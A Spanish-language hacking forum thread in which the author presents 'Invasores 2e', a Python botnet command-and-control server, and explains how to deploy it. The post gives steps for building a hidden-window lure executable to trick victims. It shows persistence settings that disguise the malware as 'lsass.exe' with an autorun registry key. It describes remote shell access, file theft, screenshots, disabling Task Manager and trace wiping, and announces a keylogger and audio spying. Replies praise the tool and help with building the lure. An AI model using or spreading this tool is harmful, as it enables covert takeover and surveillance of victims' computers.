Invasores - Un C&C para crear una botnet sencilla | Parte I

  • 8 Respuestas
  • 934 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Conectado Kirari

  • *
  • Colaborador
  • *
  • Mensajes: 144
  • Actividad:
    100%
  • Country: 00
  • Reputación 9
  • No dejes que el mundo te corrompa
    • Ver Perfil
    • Baúl para el público





Muy buenas a todos! La verdad es que no recuerdo haber escrito un post acá, pero supongo que es la primera vez. :)

Bueno, antes de empezar quiero aclarar que a este proyecto lo deje pausado hace bastante, por lo que puede que falle en algunas ocasiones. Pero aún sigue en fase de desarrollo, desconozco cuando lo seguiré, pero creo que será dentro de poco. ;D

Así que sin más preámbulos, comencemos con lo bueno…

¿Qué es Invasores 2e?

Invasores 2e es un servidor de C&C (desarrollado en Python) para armar una botnet simple.


¿Pero por qué le pusiste “Invasores 2e”?

Bueno, simplemente el “Invasores”, porque quise darle al C&C un toque alienígena, con mensajes, música, etc. Más que un servidor de este tipo, le quise dar un estilo de videojuego, pero ya saben cual es la realidad jaja. En cuanto lo del “2e”, es solo porque hice varias versiones, desde la “2a” hasta esta. Y ahora posiblemente haga la “2f” que es con entorno gráfico.

Bien, ahora ¿podés explicarme cómo funciona?

Claro, pero primero descarga el programa, lo puedes hacer entrando al siguiente link:

You are not allowed to view links. Register or Login

De ahí, vas “Clone or Download” y selecciones “Download ZIP”.

O puedes también clonar el repositorio:

Código: You are not allowed to view links. Register or Login
git clone https://github.com/Kirari-Senpai/invasores-2e.git
cd invasores-2e/

Una vez hecho lo anterior, vamos a instalar las dependencias, hacemos lo siguiente:

Código: You are not allowed to view links. Register or Login
pip3 install -r requirements.txt

Puede que el pip varíe según como hayan instalado Python, yo de por sí lo tengo como pip3.
Ahora bien, llega lo bueno.


Configurar el servidor
No hay muchas configuraciones para hacer por ahora en Invasores, por lo que solo se puede configurar lo que es la IP y el puerto del servidor. Para hacerlo:

Código: You are not allowed to view links. Register or Login
cd server/core/

Una vez en ese directorio, con el editor que quieran, abran el archivo "config.py", por ejemplo, yo lo haré con vim:

Código: You are not allowed to view links. Register or Login
vim config.py

Ahí modificaremos las variables IP y PORT con la de nuestra PC, guardamos y listo.
Luego seguimos con el cliente.

Configurar el cliente

Para el cliente hacemos los mismos pasos que la vez anterior:

Código: You are not allowed to view links. Register or Login
cd server/core/

Una vez en ese directorio, con el editor que quieran, abran el archivo "config.py", y el resto ya lo saben :)

Código: You are not allowed to view links. Register or Login
vim config.py

Ahí modificaremos las variables IP y PORT del servidor, guardamos y listo.

Configuraciones extra para el cliente

Otra pequeña configuración es el de la persistencia:

Código: You are not allowed to view links. Register or Login
NOMBRE_MALWARE = "lsass.exe"        # Acá podrán cambiar el nombre del malware que será copiado para obtener persistencia
RUTA_MALWARE_DESTINO = tempfile.gettempdir() + "\\" + NOMBRE_MALWARE    # La ruta donde se copiará el malware. Por defecto, se copiará en los archivos temporales del usuario
NOMBRE_REGISTRO_MALWARE = NOMBRE_MALWARE[:-4]   # Nombre que tendrá el registro de autoejecucion del malware. Por defecto lleva el nombre original del programa

Ahora que está todo listo, podremos seguir.

Crear ejecutable

Antes de atraer a la víctima, necesitamos crear un señuelo, con el cual atraeremos y controlaremos al capturado. Para esto, hacemos lo siguiente:

Código: You are not allowed to view links. Register or Login
pyinstaller --noconsole --onefile client.py

** Dependiendo tu sistema operativo, puede que el ejecutable sea “./client” ó “client.exe”**
** Otra dato, es que si por ejemplo al señuelo lo vás a crear en otro sistema, es que allí también, instales las dependencias, porque el ejecutable traerá problemas. **


Bien ahora que aclaramos todo lo de la configuración, podemos seguir con el núcleo.

Comenzar con la invasión

Hacemos lo siguiente:

Código: You are not allowed to view links. Register or Login
cd server/
python3 invasores.py


Ahora si ¿me puedes explicar cómo funciona o qué hace?

Oh cierto! Bueno antes de empezar con la acción, no podemos operar con alguien si no la abducimos, por tanto, se realizará lo siguiente:

  • Abducción automática

Cuando hayamos raptado al individuo, podremos hacer diferentes cosas:

  • Manejarlo a nuestro antojo mediante una shell
  • Subir y descargar archivos
  • Screenshot
  • Persistencia
  • Autoremoverse
  • Deshabilitar administrador de tareas


Técnica de captura de humanos



Abducción automática
Tus compañeros de nave atraparán terrícolas, sin necesidad de que tu esperes por ellos. En pocas palabras, la tarea para aceptar conexiones, correrá en segundo plano.

Abducción en vivo
Accediendo al menú de abducciones, podremos solicitar ver en vivo la captura de humanos.



Laboratorio

Ver a los individuos que hayas raptado

Dentro del menú laboratorio, simplemente con tipear "listar" podrás ver a todas las personas que hayas capturado en el camino.



Manipulación alienígena

Permite tomar el control de un cuerpo en específico para operar. Esto se hace mediante el comando:

Código: You are not allowed to view links. Register or Login
manipular <id>



Asesinar basura humana

Una vez que la persona no te haga más falta, puedes eliminarla de tu lista con el siguiente comando:

Código: You are not allowed to view links. Register or Login
matar <id>



Módulos para operar con el individuo

Estas están disponibles en el menú de "control total", una vez se haya ejecutado el comando de Manipulación alienígena:

Shell
Devuelve una shell.



Subir y descargar archivos

Claramente como lo dice el subtitulo, podrás subir cualquier archivo de tú máquina al del equipo víctima. Igualmente vas a poder descargar cualquier archivo del secuestrado.

Código: You are not allowed to view links. Register or Login
subir "<Ruta origen completa>" "<Ruta destino completa>"



Código: You are not allowed to view links. Register or Login
descargar "<Ruta origen completa>" "<Ruta destino completa>"



Screenshot

Si quieres pruebas de que la víctima no te engaña, toma capturas de pantalla para corroborar sus acciones.



Instalarse

Podrás copiarte en los registros del sistema para obtener persistencia.



Remover

Una vez que hayas acabado con la víctima, puedes eliminar todo tipo de rastro del bicho implantado en el sistema.



Deshabilitar administrador de tareas

La víctima tratará de librarse de tí, pero no será muy fácil. Podrás deshabilitar el administrador de tareas para evitar que el cierre tu actividad en su interior.



Persistencia

Podrás copiarte en los registros del sistema para obtener persistencia.



Autoremover

Una vez que hayas acabado con la víctima, puedes eliminar todo tipo de rastro del bicho implantado en el sistema.



Purga masiva

Se hace una limpieza completa en todas las víctimas para no dejar rastros, para posteriormente eliminarlos. Para hacerlo, se utiliza el comando:

Código: You are not allowed to view links. Register or Login
destruirlos



Próximamente en Invasores

Netcat

Si estabas dudando de esto, bueno es cierto, tenemos soporte con Netcat. En el peor de los casos, que nos sintamos inseguros con la shell común, podremos usar el módulo de Netcat para el mismo fin, pero mucho mejor.

Keylogger

Graba cualquier movimiento que la víctima haga mediante pulsaciones en el teclado. Toda la información se registrará en un archivo.

Grabar audio

Si quieres mantenerte informado de lo que sucede alrededor del capturado, entonces activa este módulo, para escuchar todos sus movimientos.



Perfecto ¿Y cuáles son los requerimientos?

Un sistema operativo basado en Linux. Recomiendo Kali Linux en su última versión 2019.4. Solo ha sido probado en este último, por lo que si lo utiliza en otro sistema, tal vez, podría causarle algún problema.



Para terminar

Sé que no tiene muchas funcionalidades, pero poco a poco se las iré agregando   :D

Y bueno compañeros, eso es todo, a este proyecto aún le falta mucho por mejorar, pero les quería mostrar esta primera parte. Como pudieron apreciar, no es muy difícil de usar, si no saben los comandos, al tipear "ayuda", les mostrará los comandos disponibles. De última, me pueden enviar un msj y trataré de responder a la brevedad. El que quiera aportar es completamente bienvenido.  ;) ;)

Saludos a todos!
Kirari-

« Última modificación: Marzo 06, 2020, 10:02:46 pm por Kirari »
Jamás te contarán la verdadera versión, siempre te dirán la suya... Por eso... Si quieres saber la verdad, debes buscarla tú mismo...

Conectado DtxdF

  • *
  • Moderador Global
  • Mensajes: 688
  • Actividad:
    100%
  • Reputación 16
  • Eres un auto y tienes dos opciones: Parar o Seguir
    • Ver Perfil
    • Mi repositorio de Github donde encontraras herramientas para tu trabajo.
    • Email
@You are not allowed to view links. Register or Login

Un post y herramienta por excelencia compañero. ¡Te quedo de rechupete!  :D

~ DtxdF
Los seres humanos son robots, cuyo combustible es el afanado dinero.

Conectado Kirari

  • *
  • Colaborador
  • *
  • Mensajes: 144
  • Actividad:
    100%
  • Country: 00
  • Reputación 9
  • No dejes que el mundo te corrompa
    • Ver Perfil
    • Baúl para el público
Muchas gracias amigo!   ;)
Jamás te contarán la verdadera versión, siempre te dirán la suya... Por eso... Si quieres saber la verdad, debes buscarla tú mismo...

Desconectado Hackdark

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
Crear ejecutable

Antes de atraer a la víctima, necesitamos crear un señuelo, con el cual atraeremos y controlaremos al capturado. Para esto, hacemos lo siguiente:

Código: [Seleccionar]

pyinstaller --noconsole --onefile client.py

No entiendo muy bien donde debo ejecutar ese comando, si me lo puede aclarar alguien muchas gracias!!!

Conectado DtxdF

  • *
  • Moderador Global
  • Mensajes: 688
  • Actividad:
    100%
  • Reputación 16
  • Eres un auto y tienes dos opciones: Parar o Seguir
    • Ver Perfil
    • Mi repositorio de Github donde encontraras herramientas para tu trabajo.
    • Email
Hola @You are not allowed to view links. Register or Login

Se usa Pyinstaller para crear un ejecutable (Exe, en el caso de Windows) a partir de un script de Python (.py) con el fin de hacerlo portable.

Ya se ha hecho un post sobre ello: underc0de.org/foro/python/(python-3-x)-como-compilar-py-a-exe!-(usando-pyinstaller)/

~ DtxdF
Los seres humanos son robots, cuyo combustible es el afanado dinero.

Desconectado Hackdark

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
hola @You are not allowed to view links. Register or Login muchas gracias por tu respuesta amigo un abrazo.

Conectado DtxdF

  • *
  • Moderador Global
  • Mensajes: 688
  • Actividad:
    100%
  • Reputación 16
  • Eres un auto y tienes dos opciones: Parar o Seguir
    • Ver Perfil
    • Mi repositorio de Github donde encontraras herramientas para tu trabajo.
    • Email
Siempre es un placer  ;)
Los seres humanos son robots, cuyo combustible es el afanado dinero.

Desconectado AXCESS

  • *
  • Moderador Global
  • Mensajes: 743
  • Actividad:
    100%
  • Country: 00
  • Reputación 15
    • Ver Perfil
    • Email
Está muy interesante.

[Modificación]

Ok.
Ya lo entendí.

Es un servidor de comando y control, que permite un abanico de funciones (aquí fue donde me confundí). Siendo la plataforma de soporte.

Leí el post con calma y descansado. Ya al instalarlo es mucho más obvio.

Es que hice fijación con las funciones. Pero ya entendí lo de la intrusión, el señuelo, etc.

Lo de los marcianos, me sacó del paso también.

Muy bueno.



« Última modificación: Marzo 11, 2020, 01:05:07 pm por AXCESS »
You are not allowed to view links. Register or Login

Conectado Kirari

  • *
  • Colaborador
  • *
  • Mensajes: 144
  • Actividad:
    100%
  • Country: 00
  • Reputación 9
  • No dejes que el mundo te corrompa
    • Ver Perfil
    • Baúl para el público
Muchas gracias @You are not allowed to view links. Register or Login! Aprecio mucho el comentario   :D
Jamás te contarán la verdadera versión, siempre te dirán la suya... Por eso... Si quieres saber la verdad, debes buscarla tú mismo...

 

Eternal - Un escáner para Eternal Blue

Iniciado por puntoCL

Respuestas: 2
Vistas: 4307
Último mensaje Julio 23, 2017, 10:37:05 pm
por puntoCL
[Phishing] Página de phishing para Twitter

Iniciado por bernatixer

Respuestas: 8
Vistas: 8218
Último mensaje Enero 07, 2016, 10:23:35 am
por ANTRAX
Sniffer para windows "RawCap"

Iniciado por s747ik

Respuestas: 1
Vistas: 4244
Último mensaje Junio 12, 2011, 04:08:03 pm
por staRgan
Un Redirect en Facebook para hacer Phishing a Facebook

Iniciado por Stiuvert

Respuestas: 4
Vistas: 7423
Último mensaje Enero 09, 2014, 11:46:26 pm
por Snifer
Paso a paso para ser un verdadero < HACKER > lo mejor que hay

Iniciado por smown

Respuestas: 5
Vistas: 6150
Último mensaje Agosto 17, 2018, 09:20:02 am
por ANTRAX